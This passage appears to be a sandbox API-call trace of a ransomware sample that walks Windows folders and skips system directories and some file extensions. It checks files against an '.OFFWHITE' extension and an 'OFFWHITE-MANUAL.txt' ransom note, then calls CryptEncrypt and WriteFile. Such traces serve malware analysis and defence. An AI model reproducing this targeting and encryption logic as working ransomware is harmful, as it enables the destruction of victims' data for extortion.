1 [0146.605] lstrcmpiW (lpString1=".tmp", lpString2=".cmd") returned 1 [0146.605] lstrcmpiW (lpString1=".tmp", lpString2=".com") returned 1 [0146.605] lstrcmpiW (lpString1=".tmp", lpString2=".cpl") returned 1 [0146.605] lstrcmpiW (lpString1=".tmp", lpString2=".ini") returned 1 [0146.605] lstrcmpiW (lpString1=".tmp", lpString2=".dll") returned 1 [0146.605] lstrcmpiW (lpString1=".tmp", lpString2=".url") returned -1 [0146.605] lstrcmpiW (lpString1=".tmp", lpString2=".ttf") returned -1 [0146.605] lstrcmpiW (lpString1=".tmp", lpString2=".mp3") returned 1 [0146.605] lstrcmpiW (lpString1=".tmp", lpString2=".pif") returned 1 [0146.605] lstrcmpiW (lpString1=".tmp", lpString2=".mp4") returned 1 [0146.605] lstrcmpiW (lpString1=".tmp", lpString2=".OFFWHITE") returned 1 [0146.605] lstrcmpiW (lpString1=".tmp", lpString2=".msi") returned 1 [0146.605] lstrcmpiW (lpString1="sql9829.tmp", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0146.605] GetProcessHeap () returned 0x500000 [0146.605] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x546f78 [0146.605] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\RAC\\Temp\\sql9829.tmp" (normalized: "c:\\users\\all users\\microsoft\\rac\\temp\\sql9829.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.605] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295d860 | out: lpFileSize=0x295d860*=-4251592508) returned 0 [0146.605] GetProcessHeap () returned 0x500000 [0146.605] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546a88 [0146.605] GetProcessHeap () returned 0x500000 [0146.606] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546aa0 [0146.606] GetProcessHeap () returned 0x500000 [0146.606] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5602b0 [0146.606] GetProcessHeap () returned 0x500000 [0146.606] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5603b8 [0146.606] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.606] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.606] SystemFunction036 (in: RandomBuffer=0x546a88, RandomBufferLength=0x10 | out: RandomBuffer=0x546a88) returned 1 [0146.606] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.606] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.606] SystemFunction036 (in: RandomBuffer=0x546aa0, RandomBufferLength=0x10 | out: RandomBuffer=0x546aa0) returned 1 [0146.606] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.606] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.606] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5602b0*, pdwDataLen=0x295d610*=0x10, dwBufLen=0x100 | out: pbData=0x5602b0*, pdwDataLen=0x295d610*=0x100) returned 1 [0146.606] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.606] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.606] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5603b8*, pdwDataLen=0x295d60c*=0x10, dwBufLen=0x100 | out: pbData=0x5603b8*, pdwDataLen=0x295d60c*=0x100) returned 1 [0146.607] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295d8c4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0146.607] SetLastError (dwErrCode=0x0) [0146.607] WriteFile (in: hFile=0xffffffff, lpBuffer=0x5602b0, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0) returned 0 [0146.607] GetLastError () returned 0x6 [0146.607] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbb154120, ftCreationTime.dwHighDateTime=0x1d62251, ftLastAccessTime.dwLowDateTime=0xbb154120, ftLastAccessTime.dwHighDateTime=0x1d62251, ftLastWriteTime.dwLowDateTime=0xbb154120, ftLastWriteTime.dwHighDateTime=0x1d62251, nFileSizeHigh=0x0, nFileSizeLow=0x5000, dwReserved0=0x4a0048, dwReserved1=0x295e370, cFileName="sql9849.tmp", cAlternateFileName="")) returned 1 [0146.607] lstrcmpiW (lpString1="sql9849.tmp", lpString2=".") returned 1 [0146.607] lstrcmpiW (lpString1="sql9849.tmp", lpString2="..") returned 1 [0146.607] lstrcmpiW (lpString1="sql9849.tmp", lpString2="...") returned 1 [0146.607] lstrcmpiW (lpString1="sql9849.tmp", lpString2="windows") returned -1 [0146.607] lstrcmpiW (lpString1="sql9849.tmp", lpString2="$recycle.bin") returned 1 [0146.607] lstrcmpiW (lpString1="sql9849.tmp", lpString2="rsa") returned 1 [0146.607] lstrcmpiW (lpString1="sql9849.tmp", lpString2="ntuser.dat") returned 1 [0146.607] lstrcmpiW (lpString1="sql9849.tmp", lpString2="programdata") returned 1 [0146.607] lstrcmpiW (lpString1="sql9849.tmp", lpString2="appdata") returned 1 [0146.607] lstrcmpiW (lpString1="sql9849.tmp", lpString2="program files") returned 1 [0146.607] lstrcmpiW (lpString1="sql9849.tmp", lpString2="program files (x86)") returned 1 [0146.607] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Microsoft\\RAC\\Temp\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\RAC\\Temp\\") returned="C:/Users\\All Users\\Microsoft\\RAC\\Temp\\" [0146.607] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\RAC\\Temp\\", lpString2="sql9849.tmp" | out: lpString1="C:/Users\\All Users\\Microsoft\\RAC\\Temp\\sql9849.tmp") returned="C:/Users\\All Users\\Microsoft\\RAC\\Temp\\sql9849.tmp" [0146.607] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.607] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.607] PathFindExtensionW (pszPath="sql9849.tmp") returned=".tmp" [0146.607] lstrcmpiW (lpString1=".tmp", lpString2=".exe") returned 1 [0146.607] lstrcmpiW (lpString1=".tmp", lpString2=".log") returned 1 [0146.608] lstrcmpiW (lpString1=".tmp", lpString2=".cab") returned 1 [0146.608] lstrcmpiW (lpString1=".tmp", lpString2=".cmd") returned 1 [0146.608] lstrcmpiW (lpString1=".tmp", lpString2=".com") returned 1 [0146.608] lstrcmpiW (lpString1=".tmp", lpString2=".cpl") returned 1 [0146.608] lstrcmpiW (lpString1=".tmp", lpString2=".ini") returned 1 [0146.608] lstrcmpiW (lpString1=".tmp", lpString2=".dll") returned 1 [0146.608] lstrcmpiW (lpString1=".tmp", lpString2=".url") returned -1 [0146.608] lstrcmpiW (lpString1=".tmp", lpString2=".ttf") returned -1 [0146.608] lstrcmpiW (lpString1=".tmp", lpString2=".mp3") returned 1 [0146.608] lstrcmpiW (lpString1=".tmp", lpString2=".pif") returned 1 [0146.608] lstrcmpiW (lpString1=".tmp", lpString2=".mp4") returned 1 [0146.608] lstrcmpiW (lpString1=".tmp", lpString2=".OFFWHITE") returned 1 [0146.608] lstrcmpiW (lpString1=".tmp", lpString2=".msi") returned 1 [0146.608] lstrcmpiW (lpString1="sql9849.tmp", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0146.608] GetProcessHeap () returned 0x500000 [0146.608] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x546f88 [0146.608] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\RAC\\Temp\\sql9849.tmp" (normalized: "c:\\users\\all users\\microsoft\\rac\\temp\\sql9849.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.610] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295d860 | out: lpFileSize=0x295d860*=-4251592508) returned 0 [0146.611] GetProcessHeap () returned 0x500000 [0146.611] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546ab8 [0146.611] GetProcessHeap () returned 0x500000 [0146.611] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546ad0 [0146.611] GetProcessHeap () returned 0x500000 [0146.611] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5604c0 [0146.611] GetProcessHeap () returned 0x500000 [0146.611] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5605c8 [0146.611] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.611] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.611] SystemFunction036 (in: RandomBuffer=0x546ab8, RandomBufferLength=0x10 | out: RandomBuffer=0x546ab8) returned 1 [0146.611] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.611] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.611] SystemFunction036 (in: RandomBuffer=0x546ad0, RandomBufferLength=0x10 | out: RandomBuffer=0x546ad0) returned 1 [0146.611] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.611] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.611] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5604c0*, pdwDataLen=0x295d610*=0x10, dwBufLen=0x100 | out: pbData=0x5604c0*, pdwDataLen=0x295d610*=0x100) returned 1 [0146.611] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.611] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.611] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5605c8*, pdwDataLen=0x295d60c*=0x10, dwBufLen=0x100 | out: pbData=0x5605c8*, pdwDataLen=0x295d60c*=0x100) returned 1 [0146.611] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295d8c4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0146.611] SetLastError (dwErrCode=0x0) [0146.612] WriteFile (in: hFile=0xffffffff, lpBuffer=0x5604c0, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0) returned 0 [0146.612] GetLastError () returned 0x6 [0146.612] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbb154120, ftCreationTime.dwHighDateTime=0x1d62251, ftLastAccessTime.dwLowDateTime=0xbb154120, ftLastAccessTime.dwHighDateTime=0x1d62251, ftLastWriteTime.dwLowDateTime=0xbb154120, ftLastWriteTime.dwHighDateTime=0x1d62251, nFileSizeHigh=0x0, nFileSizeLow=0x5000, dwReserved0=0x4a0048, dwReserved1=0x295e370, cFileName="sql9849.tmp", cAlternateFileName="")) returned 0 [0146.612] FindClose (in: hFindFile=0x544590 | out: hFindFile=0x544590) returned 1 [0146.612] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xbb154120, ftLastAccessTime.dwHighDateTime=0x1d62251, ftLastWriteTime.dwLowDateTime=0xbb154120, ftLastWriteTime.dwHighDateTime=0x1d62251, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="Temp", cAlternateFileName="")) returned 0 [0146.612] FindClose (in: hFindFile=0x544650 | out: hFindFile=0x544650) returned 1 [0146.612] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27df8b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27df8b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27df8b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="Search", cAlternateFileName="")) returned 1 [0146.612] lstrcmpiW (lpString1="Search", lpString2=".") returned 1 [0146.612] lstrcmpiW (lpString1="Search", lpString2="..") returned 1 [0146.612] lstrcmpiW (lpString1="Search", lpString2="...") returned 1 [0146.612] lstrcmpiW (lpString1="Search", lpString2="windows") returned -1 [0146.612] lstrcmpiW (lpString1="Search", lpString2="$recycle.bin") returned 1 [0146.612] lstrcmpiW (lpString1="Search", lpString2="rsa") returned 1 [0146.612] lstrcmpiW (lpString1="Search", lpString2="ntuser.dat") returned 1 [0146.612] lstrcmpiW (lpString1="Search", lpString2="programdata") returned 1 [0146.612] lstrcmpiW (lpString1="Search", lpString2="appdata") returned 1 [0146.612] lstrcmpiW (lpString1="Search", lpString2="program files") returned 1 [0146.612] lstrcmpiW (lpString1="Search", lpString2="program files (x86)") returned 1 [0146.612] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\All Users\\Microsoft\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\") returned="C:/Users\\All Users\\Microsoft\\" [0146.612] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\", lpString2="Search" | out: lpString1="C:/Users\\All Users\\Microsoft\\Search") returned="C:/Users\\All Users\\Microsoft\\Search" [0146.612] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Search", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Search\\") returned="C:/Users\\All Users\\Microsoft\\Search\\" [0146.612] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\All Users\\Microsoft\\Search\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Search\\") returned="C:/Users\\All Users\\Microsoft\\Search\\" [0146.612] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Search\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\Search\\*.*") returned="C:/Users\\All Users\\Microsoft\\Search\\*.*" [0146.612] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\Search\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27df8b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27df8b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27df8b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName=".", cAlternateFileName="")) returned 0x544650 [0146.615] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0146.615] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27df8b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27df8b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27df8b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="..", cAlternateFileName="")) returned 1 [0146.615] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0146.615] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0146.615] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27df8b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27e6af80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27e6af80, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="Data", cAlternateFileName="")) returned 1 [0146.616] lstrcmpiW (lpString1="Data", lpString2=".") returned 1 [0146.616] lstrcmpiW (lpString1="Data", lpString2="..") returned 1 [0146.616] lstrcmpiW (lpString1="Data", lpString2="...") returned 1 [0146.616] lstrcmpiW (lpString1="Data", lpString2="windows") returned -1 [0146.616] lstrcmpiW (lpString1="Data", lpString2="$recycle.bin") returned 1 [0146.616] lstrcmpiW (lpString1="Data", lpString2="rsa") returned -1 [0146.616] lstrcmpiW (lpString1="Data", lpString2="ntuser.dat") returned -1 [0146.616] lstrcmpiW (lpString1="Data", lpString2="programdata") returned -1 [0146.616] lstrcmpiW (lpString1="Data", lpString2="appdata") returned 1 [0146.616] lstrcmpiW (lpString1="Data", lpString2="program files") returned -1 [0146.616] lstrcmpiW (lpString1="Data", lpString2="program files (x86)") returned -1 [0146.616] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\All Users\\Microsoft\\Search\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Search\\") returned="C:/Users\\All Users\\Microsoft\\Search\\" [0146.616] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Search\\", lpString2="Data" | out: lpString1="C:/Users\\All Users\\Microsoft\\Search\\Data") returned="C:/Users\\All Users\\Microsoft\\Search\\Data" [0146.616] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Search\\Data", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Search\\Data\\") returned="C:/Users\\All Users\\Microsoft\\Search\\Data\\" [0146.616] lstrcpyW (in: lpString1=0x295dcf0, lpString2="C:/Users\\All Users\\Microsoft\\Search\\Data\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Search\\Data\\") returned="C:/Users\\All Users\\Microsoft\\Search\\Data\\" [0146.616] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Search\\Data\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\Search\\Data\\*.*") returned="C:/Users\\All Users\\Microsoft\\Search\\Data\\*.*" [0146.616] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\Search\\Data\\*.*", lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27df8b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27e6af80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27e6af80, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x50004e, dwReserved1=0x295e370, cFileName=".", cAlternateFileName="")) returned 0x544590 [0146.616] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0146.616] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27df8b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27e6af80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27e6af80, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x50004e, dwReserved1=0x295e370, cFileName="..", cAlternateFileName="")) returned 1 [0146.617] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0146.617] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0146.617] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e6af80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27e6af80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27e6af80, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x50004e, dwReserved1=0x295e370, cFileName="Applications", cAlternateFileName="APPLIC~1")) returned 1 [0146.617] lstrcmpiW (lpString1="Applications", lpString2=".") returned 1 [0146.617] lstrcmpiW (lpString1="Applications", lpString2="..") returned 1 [0146.617] lstrcmpiW (lpString1="Applications", lpString2="...") returned 1 [0146.617] lstrcmpiW (lpString1="Applications", lpString2="windows") returned -1 [0146.617] lstrcmpiW (lpString1="Applications", lpString2="$recycle.bin") returned 1 [0146.617] lstrcmpiW (lpString1="Applications", lpString2="rsa") returned -1 [0146.617] lstrcmpiW (lpString1="Applications", lpString2="ntuser.dat") returned -1 [0146.617] lstrcmpiW (lpString1="Applications", lpString2="programdata") returned -1 [0146.617] lstrcmpiW (lpString1="Applications", lpString2="appdata") returned 1 [0146.617] lstrcmpiW (lpString1="Applications", lpString2="program files") returned -1 [0146.617] lstrcmpiW (lpString1="Applications", lpString2="program files (x86)") returned -1 [0146.617] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Microsoft\\Search\\Data\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Search\\Data\\") returned="C:/Users\\All Users\\Microsoft\\Search\\Data\\" [0146.617] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Search\\Data\\", lpString2="Applications" | out: lpString1="C:/Users\\All Users\\Microsoft\\Search\\Data\\Applications") returned="C:/Users\\All Users\\Microsoft\\Search\\Data\\Applications" [0146.617] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Search\\Data\\Applications", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Search\\Data\\Applications\\") returned="C:/Users\\All Users\\Microsoft\\Search\\Data\\Applications\\" [0146.617] lstrcpyW (in: lpString1=0x295d670, lpString2="C:/Users\\All Users\\Microsoft\\Search\\Data\\Applications\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Search\\Data\\Applications\\") returned="C:/Users\\All Users\\Microsoft\\Search\\Data\\Applications\\" [0146.617] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Search\\Data\\Applications\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\Search\\Data\\Applications\\*.*") returned="C:/Users\\All Users\\Microsoft\\Search\\Data\\Applications\\*.*" [0146.617] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\Search\\Data\\Applications\\*.*", lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e6af80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27e6af80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27e6af80, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5a0058, dwReserved1=0x295dcf0, cFileName=".", cAlternateFileName="")) returned 0x544750 [0146.621] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0146.621] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e6af80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27e6af80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27e6af80, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5a0058, dwReserved1=0x295dcf0, cFileName="..", cAlternateFileName="")) returned 1 [0146.621] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0146.621] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0146.621] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e6af80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29612a20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29612a20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5a0058, dwReserved1=0x295dcf0, cFileName="Windows", cAlternateFileName="")) returned 1 [0146.621] lstrcmpiW (lpString1="Windows", lpString2=".") returned 1 [0146.621] lstrcmpiW (lpString1="Windows", lpString2="..") returned 1 [0146.621] lstrcmpiW (lpString1="Windows", lpString2="...") returned 1 [0146.621] lstrcmpiW (lpString1="Windows", lpString2="windows") returned 0 [0146.621] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e6af80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29612a20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29612a20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5a0058, dwReserved1=0x295dcf0, cFileName="Windows", cAlternateFileName="")) returned 0 [0146.621] FindClose (in: hFindFile=0x544750 | out: hFindFile=0x544750) returned 1 [0146.622] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e1ecc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27e1ecc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27e1ecc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x50004e, dwReserved1=0x295e370, cFileName="Temp", cAlternateFileName="")) returned 1 [0146.622] lstrcmpiW (lpString1="Temp", lpString2=".") returned 1 [0146.622] lstrcmpiW (lpString1="Temp", lpString2="..") returned 1 [0146.622] lstrcmpiW (lpString1="Temp", lpString2="...") returned 1 [0146.622] lstrcmpiW (lpString1="Temp", lpString2="windows") returned -1 [0146.622] lstrcmpiW (lpString1="Temp", lpString2="$recycle.bin") returned 1 [0146.622] lstrcmpiW (lpString1="Temp", lpString2="rsa") returned 1 [0146.622] lstrcmpiW (lpString1="Temp", lpString2="ntuser.dat") returned 1 [0146.622] lstrcmpiW (lpString1="Temp", lpString2="programdata") returned 1 [0146.622] lstrcmpiW (lpString1="Temp", lpString2="appdata") returned 1 [0146.622] lstrcmpiW (lpString1="Temp", lpString2="program files") returned 1 [0146.622] lstrcmpiW (lpString1="Temp", lpString2="program files (x86)") returned 1 [0146.622] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Microsoft\\Search\\Data\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Search\\Data\\") returned="C:/Users\\All Users\\Microsoft\\Search\\Data\\" [0146.622] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Search\\Data\\", lpString2="Temp" | out: lpString1="C:/Users\\All Users\\Microsoft\\Search\\Data\\Temp") returned="C:/Users\\All Users\\Microsoft\\Search\\Data\\Temp" [0146.622] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Search\\Data\\Temp", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Search\\Data\\Temp\\") returned="C:/Users\\All Users\\Microsoft\\Search\\Data\\Temp\\" [0146.622] lstrcpyW (in: lpString1=0x295d670, lpString2="C:/Users\\All Users\\Microsoft\\Search\\Data\\Temp\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Search\\Data\\Temp\\") returned="C:/Users\\All Users\\Microsoft\\Search\\Data\\Temp\\" [0146.622] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Search\\Data\\Temp\\", 